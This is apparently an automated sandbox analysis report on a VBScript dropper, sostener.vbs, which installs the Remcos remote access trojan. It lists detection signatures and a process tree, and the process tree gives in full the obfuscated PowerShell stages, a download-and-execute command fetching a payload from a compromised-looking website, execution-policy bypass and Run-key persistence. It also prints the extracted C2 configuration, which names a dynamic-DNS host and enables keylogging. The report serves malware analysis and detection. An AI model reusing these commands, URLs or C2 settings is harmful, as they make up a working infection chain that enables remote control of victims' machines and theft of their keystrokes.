Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name: sostener.vbs
Analysis ID: 1519307
MD5: e260955361dc0c8454fcfa061a45f6f1
SHA1: bb77b8e3ef1c8d30cb5dbb90725d34e3c7602e13
SHA256: e9cc243923de94787673438f26c30baefe9995b38c8b8047b95726b998baf26c
Tags: vbs, user-lontze7

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6368 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 1396 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 3272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 5432 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 2032 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 6368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • RegSvcs.exe (PID: 2124 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • powershell.exe (PID: 7468 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' " MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 7604 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 7764 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8024 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 1732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8032 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8052 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • RegSvcs.exe (PID: 7336 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • RegSvcs.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • powershell.exe (PID: 1740 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' " MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 7444 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 7560 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • powershell.exe (PID: 7620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 2992 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 6468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 7788 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 7768 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • RegSvcs.exe (PID: 6852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "special2023.duckdns.org:8888:1", "Assigned name": "Nlk", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3PWW8O", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x14f20:$a1: Remcos restarted by watchdog!
  • 0x15498:$a3: %02i:%02i:%02i:%03i
00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
Source | Rule | Description | Author | Strings
3.2.powershell.exe.29b32a20000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
3.2.powershell.exe.29b32a20000.4.raw.unpack | MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen
  • 0x1726:$h2: //:sptth
  • 0xfc1:$s1: DownloadString
  • 0xe27:$s2: StrReverse
  • 0xfb0:$s3: FromBase64String
  • 0x1237:$s4: WebClient
21.2.powershell.exe.23a4acf1928.3.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
21.2.powershell.exe.23a4acf1928.3.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
21.2.powershell.exe.23a4acf1928.3.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x690a8:$a1: Remcos restarted by watchdog!
  • 0x69620:$a3: %02i:%02i:%02i:%03i
Source | Rule | Description | Author | Strings
amsi64_6916.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7924.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7728.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [syst
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
